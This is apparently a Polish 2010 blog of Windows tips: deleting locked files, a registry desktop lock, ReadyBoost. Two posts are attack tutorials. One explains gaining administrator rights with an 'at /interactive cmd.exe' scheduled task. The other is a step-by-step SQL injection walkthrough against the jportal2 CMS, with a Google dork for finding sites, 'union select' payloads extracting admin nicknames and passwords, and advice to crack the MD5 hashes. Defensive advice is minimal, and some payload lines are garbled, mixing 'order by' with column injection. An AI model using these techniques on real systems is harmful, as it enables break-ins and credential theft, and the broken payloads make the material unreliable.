Chcesz usunąć jakiś plik, ale nie możesz tego zrobić ponieważ wyskakuje ci komunikat plik jest używany, albo odmowa dostępu. Skorzystaj z porady tutaj zawartej, aby usunąć niechciane pliki - których w normalny sposób nie da się usunąć.

Istnieje jednak bezpłatne narzędzie, dzięki któremu pozbędziesz się takich właśnie plików. Program znajduje wszystkie powiązania tego pliku i zamyka ewentualne procesy z nim związane. Dzięki temu jesteśmy w stanie bezkarnie pozbyć się natrętnego pliku. 
Program nazywa się Unlocker i pobierzemy go np. z http://www.softpedia.com/progDownload/Unlocker-Portable-Download-142667.html
Będzie to wersja odpowiednia nawet gdy zgramy sobie go na pendrive. Jest to program, który nie wymaga instalacji - możemy go odpalić od razu z USB.

Po ściągnięciu klikamy na program, żeby się uruchomił : 
Klikamy Unlocker Portable, wyskoczy nam okienko w którym wybieramy plik albo folder z którym mamy problemy w usunięciu. 
Następnie wyskoczy nam okienko co chcemy zrobić z tym plikiem ;
 

No action - nic nie robimy.
Delete - usuwamy ten plik
Rename - zmieniamy jego nazwę 
Move - przenosimy.

Jeżeli chcemy usunąć to oczywiście wybieramy delete. Po wszystkim wyskoczy komunikat o prawidłowym usunięciu pliku. A więc koniec z plikami których "nie da się" usunąć !

Jak zablokować pulpit. Blokada pulpitu - jak zablokować pulpit przed zapisem.

Jak zablokować pulpit - blokada pulpitu w Windows.


Dowiedz się w jaki sposób zablokować pulpit przed zapisem. Dzięki temu zachowasz zawsze porządek na pulpicie - blokada pulpitu przed zapisem.

Klikamy przycisk start/ uruchom i wpisujemy regedit
Znajdujemy się teraz w rejestrze systemowym, gdzie musimy znaleźć klucz :
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Powinien być tam wpis : NoSaveSettings 
Jeżeli nie ma tam tego wpisu - to należy go stworzyć. Wybieramy w tym celu prawy klawisz myszki utwórz nową wartość DWORD.
Natomiast jeżeli taka wartość istniała to modyfikujemy ją - klikając na nią dwa razy lewym klawiszem myszki. W polu wartość wpisujemy 1 i dajemy ok. Od tej pory nasz pulpit zostanie zablokowany przed różnego rodzaju modyfikacjami. 
Aby powrócić do stanu poprzedniego wystarczy zmienić wartość z powrotem na zero !

wtorek, 23 listopada 2010

Jak przyśpieszyć Windows Vista ? Przyśpiesz komputer, przyśpiesz windows w kilka minut. Funkcja ReadyBoost przyśpiesza system !

Przyśpiesz swój komputer - dowiedz się jak przyśpieszyć Viste !
ReadyBoost w natarciu - zobacz jak w kilka minut sprawić, aby Windows pracował szybciej !


Dzięki użyciu pamięci flash Usb - możemy przyśpieszyć pracę systemu Windows. Jak powszechnie wiadomo pamięci USB posiadają znacznie szybszy dostęp do plików (*szybszy zapis i odczyt) niż standardowe dyski twarde. Urządzenie musi posiadać funkcję ReadyBoost - dzięki czemu po podłączeniu do komputera (wyskoczy autoodtwarzanie) będziemy mieć możliwość wyboru pozycji : "przyspieszenie systemu za pomocą Ready BOOST". Następnie na karcie która wyskoczy (właściwości) zaznaczamy "użyj tego urządzenia" ! Po wszystkim ustalamy ilość miejsca na dysku usb - pamiętaj o poniższej wskazówce.
Powinno się wkładać dysk USB o pamięci 1-3x takiej - jaką kość ram mamy włożoną do komputera. W przypadku pamięci 2GB - możemy użyć dysku o pojemności 6GB(*wykorzystywana pojemność do przyspieszenia systemu ustalona na 6GB). 
Aby sprawdzić czy Ready Boost jest ogólnie włączony wchodzimy odpowiednio : start \ uruchom i wpisujemy : services.msc
Następnie odszukujemy w usługach pozycję ReadyBoost - i sprawdzamy jej stan. Jeżeli wyświetla się "uruchomiono" to znaczy, że wszystko jest w porządku ! 
Chodzi tutaj o rozbudowę pamięci wirtualnej systemu, dzięki czemu możemy usprawnić jego pracę poprzez wzrost wydajności. 

sobota, 20 listopada 2010

Jak wejść na konto administratora bez hasła ? Dostęp do konta admina bez hasła, wchodzimy na konto administratora !

Konto administratora - jak wejść bez hasła ? Dostęp do konta admina bez hasła - sprytny sposób.
 
 flickr, trekkyandy 

Zobacz jak wejść na konto administratora, w przypadku kiedy nie pamiętamy hasła dostępu :

1. Klikamy Start / Uruchom i wpisujemy :
cmd
2. Wpisujemy w konsoli następującą komendę (jako/zamiast 15:50 - wstawiamy najbliższy czas )
at 15:50 /interactive "cmd.exe"
3.Zostanie zaplanowane zadanie w harmonogramie zadań na godzinę 
podaną przez ciebie , w moim przypadku będzie to 15:50 !
4. Kiedy dobiegnie ta godzina wyświetli się nowe okno konsoli 
- wcześniejsze zamykamy (*to co wyskoczyło zostawiamy)
5. Naciskamy klawisze :
Alt + CTRL + DEL 
w zakładce procesy zamykamy explorer.exe (zakończ proces) 
6. W otwartym oknie konsoli wpisujemy : 
explorer.exe 
7. Od teraz jesteśmy zalogowani jako użytkownik z uprawnieniami
administratora.

Jak włamać się na stronę internetową ? Atak sql injection - bezpieczeństwo IT. Zabezpiecz stronę przed włamaniem sql injection ...

Zobacz popularny atak sql injection - umożliwiający dostęp do twojej strony internetowej !
Włamanie na stronę www przy pomocy sql injection - zabezpiecz się, pokazujemy jak !

 flickr, ardenswayoflife
Atak Sql Injection jest atakiem, który umożliwia dostęp do strony internetowej - potrafi wykraść hasła użytkowników, a dzięki temu przejąć kontrolę nad stroną, edytować ją itp... jest to bardzo niebezpieczne - dlatego pokazujemy jak się przed tym chronić, oraz na czym ten atak polega ! 
Pamiętaj, że materiały tutaj dostępne są wyłącznie w celach edukacyjnych (zgodnych z prawem) ! Możesz sprawdzić ich działanie wyłącznie na własnej stronie - w ten sposób poznasz mechanizm działania tego ataku i ewentualnie ustrzeżesz się przed nim.

1. Coś na początek :

jak sami zobaczycie - atak sql injection jest bardzo niebezpieczny a w internecie aż roi się od słabo zabezpieczonych stron ! Są to nie tylko prywatne strony, ale co gorsza zdarzają się że są to ważne urzędy państwowe. Dobrze gdy znajdzie się ktoś kto powiadomi o słabym zabezpieczeniu strony - ale gorzej gdy ktoś to wykorzysta np. wykradając hasła użytkowników lub co gorsza jakieś konta bankowe itp...

2. Czym jest Sql Injection :

Posłużę się tutaj trochę wikipedią - chodzi mniej więcej o to, że część stron jest słabo filtrowana. Dzięki temu możemy o niej wstrzyknąć jakiś kod (*zapytanie), który zostanie przez skrypt serwera(*bazę danych) zrealizowany. 
Dla przykładu (dla tych którzy znają trochę zasad z logiki):
- przypomnę, że w logice - zdania logiczne przyjmują wartości (tak jak w informatyce system 2-owy) zera oraz 1 
Czyli mając np. w bazie coś takiego  (logowanie) :
Nazwa użytkownika =' ... '   - gdzie w miejsce wykropkowane normalnie wpisujemy login/hasło
Nazwa użytkownika='admin' - możemy tak wpisać, ale nie wiemy czy taki użytkownik istnieje, możemy się posłużyć zapytaniem "or" - gdzie w przypadku gdy jedno zdanie jest prawdziwe, to całe zapytanie jest prawdziwe np.
Nazwa użytkownika='admin' or '1'='1' - zdanie/zapytanie to będzie zawsze prawdziwe, wiemy że or oznacza "lub" - a zdanie 1=1 jest na 100% prawdziwe. Podobnie można zrobić z hasłem dzięki temu zalogujemy się np. na konto admina :)

Wygląda to mniej więcej tak : http://pl.wikipedia.org/wiki/SQL_injection

2. Do rzeczy - jak to wygląda w praktyce :

Nikt nie lubi czytać długich teorii więc przejdę do rzeczy - będzie to przykład błędu dla cms'a jportal2 .
W jportalu2 znaleziono lukę w skrypcie do pisania artykułów, więc nasz kod będziemy właśnie w tych miejscach wstrzykiwać.
Znajdujemy więc nasz cel wpisując np.w google zapytanie (*oczywiście musi to być nasza strona)
+"jportal2" +inurl:"articles.php?topic="
Wchodzimy na tą stronę i widzimy mniej więcej taki link :
www.nazwa.pl/articles.php?topic=1
Teraz aby sprawdzić czy nasza strona jest słabo filtrowana a tym samym podatna na sql injection - dodajemy średnik na końcu linku w przeglądarce a więc :
  www.nazwa.pl/articles.php?topic=1'

Jeżeli pojawi się komunikat w stylu : "Warning mysql_fetch_array...." - to znaczy, że strona jest podatna na atak(*mamy duże prawdopodobieństwo udanego ataku). 

Teraz czas na zapytanie " order by " aby sprawdzić ile tabel liczy baza :
Aby nam było lepiej dostrzec różnicę pomiędzy zmianami na stronie (pojawią się małe cyferki), to w miejsce "topic= " - wpiszemy w linku nie istniejący artykuł np.
www.nazwa.pl/articles.php?topic=-1
lub
www.nazwa.pl/articles.php?topic=-9999999 

Teraz piszemy zapytanie order by :
www.nazwa.pl/articles.php?topic=-1+order+by+1--
Jeżeli nie ma błędu to podnosimy liczbę :
www.nazwa.pl/articles.php?topic=-1+order+by+2--
Nadal nic....
www.nazwa.pl/articles.php?topic=-1+order+by+6--
Błąd !! A więc tabel jest mniej niż 6 - sprawdźmy dla pięciu :
www.nazwa.pl/articles.php?topic=-1+order+by+5--
Bingo :) W jportalu2 przeważnie mamy 5 tabel :) Nie ma błędu ! 

Teraz sprawdzimy do jakiej kolumny możemy się wstrzelić. Będą się tutaj pojawiać takie małe cyferki - warto ich szukać ! Są to takie małe pojedyńcze cyferki np. 2 albo 4 itp...
A więc wpisujemy jako link w oknie przeglądarki polecenie "union select" :
www.nazwa.pl/articles.php?topic=-1+union+select+1,2,3,4,5--
Szukamy samotnej cyferki i w zależności od tego co nam wyskoczy - wstrzykujemy się w tą kolumnę np.
- gdy pojawiła się 3
www.nazwa.pl/articles.php?topic=-1+order+by+1,2,zapytanie,4,5--
- gdy pojawiła się 4
www.nazwa.pl/articles.php?topic=-1+order+by+1,2,3,zapytanie,5--
- gdy mamy 1
www.nazwa.pl/articles.php?topic=-1+order+by+zapytanie,2,3,4,5--
Teraz jeżeli chcemy poznać np. hasła i nazwy użytkowników wpisujemy takie zapytanie (dla przykładu gdy pojawiła się 3) :
www.nazwa.pl/articles.php?topic=-1+order+by+1,2,nick,4,5+from+admins--
oraz
www.nazwa.pl/articles.php?topic=-1+order+by+1,2,pass,4,5+from+admins--
Pierwszy link wyciąga z bazy danych z tabeli admins kolumnę z użytkownikami. W wyniku dostaniemy nazwy użytkowników. 
Drugi link wyciąga hasła z tej samej tabeli jak wyżej. 

Wpisałem tutaj nick,pass oraz +from+admins - co to jest i skąd się to wzięło ?
Nick oraz Pass są to nazwy kolumn - przeważnie gdy chodzi o logowanie użytkowników to w bazie danych hasła są zapisane w nazwie kolumny "pass" a nicki w nazwie "nick". 
Oczywiście może tam być np. password oraz nicks czy też haslo oraz loginy !
Na tym etapie(*twojej wiedzy z tego zakresu) to metoda prób i błędów co się powiedzie :) Ale w przypadku jportal2 standardowo jest tak jak napisałem wyżej. 
Stąd pewnie już wiesz skąd wytrzasnąłem +from+admins - to jest nazwa skąd będziemy wyciągać nasze dane (+z+nazwa) - from (skąd)+(nazwa) - w tym przypadku admins. 

Istnieje także metoda sprawdzania jakie są inne nazwy tabel itp.. oraz metoda wyciągania loginów i haseł za pierwszym razem w jednym zapytaniu - ale o tym może innym razem :)

Hasła będą przeważnie zakodowane (ale nie zawsze) w kodzie md5, musimy je odkodować w google łatwo znaleźć takie rzeczy :) NP. http://www.md5decrypter.com/ , albo wystarczy wpisać ten hash.

Co zrobić aby się zabezpieczyć przed atakiem sql injection (*jportal2):

Trzeba mieć aktualne wersje skryptu - dlatego są różnego rodzaju poprawki i wychodzą nowe wersje. W przypadku jportal2 warto wejść na http://jportal2.pl/articles.php , gdzie pisze co i jak trzeba wykonać aby się zabezpieczyć. Polecam także http://jportal2.pl/articles.php?id=2. Warto poprawić filtrowanie strony aby proste zapytania typu 1=1 nie przechodziły :) 
 
Dla tych którzy będą chcieli się trochę pobawić w sql injection - http://www.sqltest.uw-host.org/ oraz http://www.kacperg333.eu/ - są to strony z zadaniami z wykorzystaniem błędu sql injection !